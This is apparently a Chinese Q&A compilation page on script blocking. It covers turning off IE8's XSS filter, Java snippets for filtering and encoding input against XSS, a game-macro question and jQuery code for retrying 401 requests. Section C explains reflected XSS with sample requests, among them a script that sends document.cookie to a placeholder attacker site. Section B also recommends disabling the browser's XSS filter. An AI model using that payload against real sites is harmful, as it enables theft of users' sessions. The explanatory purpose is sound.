腳本防攔截_如何取消阻止跨站腳本

A. 如何取消阻止跨站腳本

取消阻止跨站腳本，請按以下步驟操作：

1、點擊 IE8 的「工具」-「Internet 選項」。

(1)腳本防攔截擴展閱讀

IE瀏覽器的安全構架：

Internet Explorer使用一個基於區域的安全架構，意思是說網站按特寫的條件組織在一起。它允許對大量的功能進行限制，也允許只對指定功能進行限制。

對瀏覽器的補丁和更新通過Windows更新服務以及自動更新定期發布以供使用。

最新版的Internet Explorer提供了一個下載監視器和安裝監視器，允許用戶分兩步選擇是否下載和安裝可執行程序。這可以防止惡意軟體被安裝。

用Internet Explorer下載的可執行文件被操作系統標為潛在的不安全因素，每次都會要求用戶確認他們是否想執行該程序，直到用戶確認該文件為「安全」為止。

參考資料來源：網路-Internet Explorer

B. IE瀏覽器阻止跨站腳本什麼原因,怎麼解決

登陸protal後，點擊查看報表，這是protal會發送轉到cognos的請求，如果使用的IE8，則這個請求會被攔截，提示「Internet Explorer 已對此頁面進行了修改，以幫助阻止跨站腳本。單擊此處，獲取詳細信息...」。這個錯誤是由於 IE8 的跨站腳本(Cross-site scripting, XSS)防護阻止了跨站發送的請求。點擊 IE8 的「工具」-「Internet 選項」，進入「安全」選項卡，打開「Internet」下方的「自定義級別」，在「安全設置」對話框中找到「啟用 XSS 篩選器」，改為「禁用」即可

C. 如何防止跨站點腳本攻擊

防止跨站點腳本攻擊的解決方法：

1.輸入過濾

對每一個用戶的輸入或者請求首部，都要進行過濾。這需要程序員有良好的安全素養，而且需要覆蓋到所有的輸入源。而且還不能夠阻止其他的一些問題，如錯誤頁等。
final String filterPattern="[<>{}\\[\\];\\&]";
String inputStr = s.replaceAll(filterPattern," ");

2.輸出過濾

public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i < chars.length; i++)
{
buf.append("&#" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}

byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i < inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 & 0xf) << 4) +
(b2 & 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}

String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}


<error-page>
<error-code>404</error-code>
<location>/errPage404</location>
</error-page>


<error-page>
<exception-type>javax.servlet.ServletException</exception-type>
<location>/errPageServ</location>
</error-page>


<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/errPageGeneric</location>
</error-page>
任何的非servlet例外都被/errPageGeneric路徑捕捉，這樣就可以處理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );

3.安裝三方的應用防火牆，可以攔截css攻擊。

附：

跨站腳本不像其他攻擊只包含兩個部分：攻擊者和web站點。
跨站腳本包含三個部分：攻擊者，客戶和web站點。
跨站腳本攻擊的目的是竊取客戶的cookies，或者其他可以證明用戶身份的敏感信息。

攻擊
一個get請求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
www.vulnerable.site
會產生如下的結果
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker
<BR>
Welcome to our system
...
</HTML>
但是如果請求被篡改
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site
就會得到如下的響應
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
這樣在客戶端會有一段非法的腳本執行，這不具有破壞作用，但是如下的腳本就很危險了。
http://www.vulnerable.site/welcome.cgi?name=<script>window.open(「http://www.attacker.site/collect.cgi?cookie=」%2Bdocument.cookie)</script>
響應如下：
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(「http://www.attacker.site/collect.cgi?cookie=」+document.cookie)</script>
<BR>
Welcome to our system
...
</HTML>
瀏覽器回執行該腳本並將客戶的cookie發到一個攻擊者的網站，這樣攻擊者就得到了客戶的cookie。

D. 如何防止按鍵精靈腳本被游戲檢測到是模擬按鍵！

按鍵精靈有錄制功能的，就是像錄像機一樣錄制你的動作，回頭它在一模一樣的播放動作。錄制也可以生成腳本，你可以照著這個方法自己學習，英語有點基礎就能學會，很好學的。不過，按鍵精靈只能按時間做動作，沒法知道戰斗是不是已經結束了，所以你要求的功能應該實現不了。

E. 如何防止ajax請求的參數被攔截修改

jquery ajax是個很常用介面，而在請求時候，可能存在響應401的情況（身份認證過期或未登錄），比較容易出現在混合應用上，如何進行身份認證，重發失敗請求，還是值得注意的。

ajax請求有兩種方式

1. 回調

最常寫的方式，成功失敗處理以回調方式傳入。
$.ajax({ ajax參數... success : xxxxxx error: xxxxxx });
2. Deferred方式

Deferred模式我在《js非同步編程》有說明， ajax調用本身返回就是一個Deferred對象，成功失敗回調不以參數傳入。
$.ajax({ ajax參數... }).then(function(res){ //成功處理片段 },function(err){ //失敗處理片段 });
既然有這兩種方式，那應對處理401的方式也是有兩種。

401處理的兩種方式

1. 回調

這種方式的處理比較簡單，在失敗回調裡面判斷401，如果是則進行身份認證，成功重發請求。
function getXXXX(type, url, data, success, error){ $.ajax({ ajax參數... success : xxxxxx error : function(xhr,textStatus,errorThrown){ if (xhr.status == 401) { 刷新身份認證方法(function(){ getXXXX(type, url, data, success, error); }); } else{ // 調用外部的error error && error(xhr,textStatus,errorThrown); } } }); }
2. Deferred方式

這種方式目前我找到的處理方式需要修改jquery源碼。
//全局設置一個方法 $.ajaxSetup({ authError : function(callback){ 刷新身份認證方法( function(){ callback && callback(); }); } }); //jquery2.1.4版本源碼，大概是8261行 // Success/Error if ( isSuccess ) { deferred.resolveWith( callbackContext, [ success, statusText, jqXHR ] ); } else { if(( jqXHR.status == 401 || jqXHR .status == 403) && callbackContext.authError){ callbackContext.authError(function (){ state = 0; jqXHR.setRequestHeader( "Authorization", XXXXXX); jqXHR.readyState = 1; try { state = 1; transport.send( requestHeaders, done ); } catch ( e ) { // Propagate exception as error if not done if ( state < 2 ) { done( -1, e ); // Simply rethrow otherwise } else { throw e; } } }); return; } else { deferred.rejectWith( callbackContext, [ jqXHR, statusText, error ] ); } }
這里說下為什麼不能像第一種方式那樣進行請求。

有兩個原因：

1. then這種鏈式寫法，導致這請求的回調不是在參數里，而是在jQuery.Callbacks一個optionsCache全局變數里，我們無法在ajax error里拿到回調函數進行重發。

2. 寫在then里的回調觸發一次就會被銷毀，當觸發了error時，回調執行後就銷毀。

最後的處理方式就是在要觸發error之前，攔截401的錯誤，重新進行身份認證，然後重置狀態，重發請求。

以上這篇當jquery ajax遇上401請求的解決方法就是小編分享給大家的全部內容了，希望能給大家一個參考，也希望大家多多支持腳本之家。

腳本防攔截

與腳本防攔截相關的內容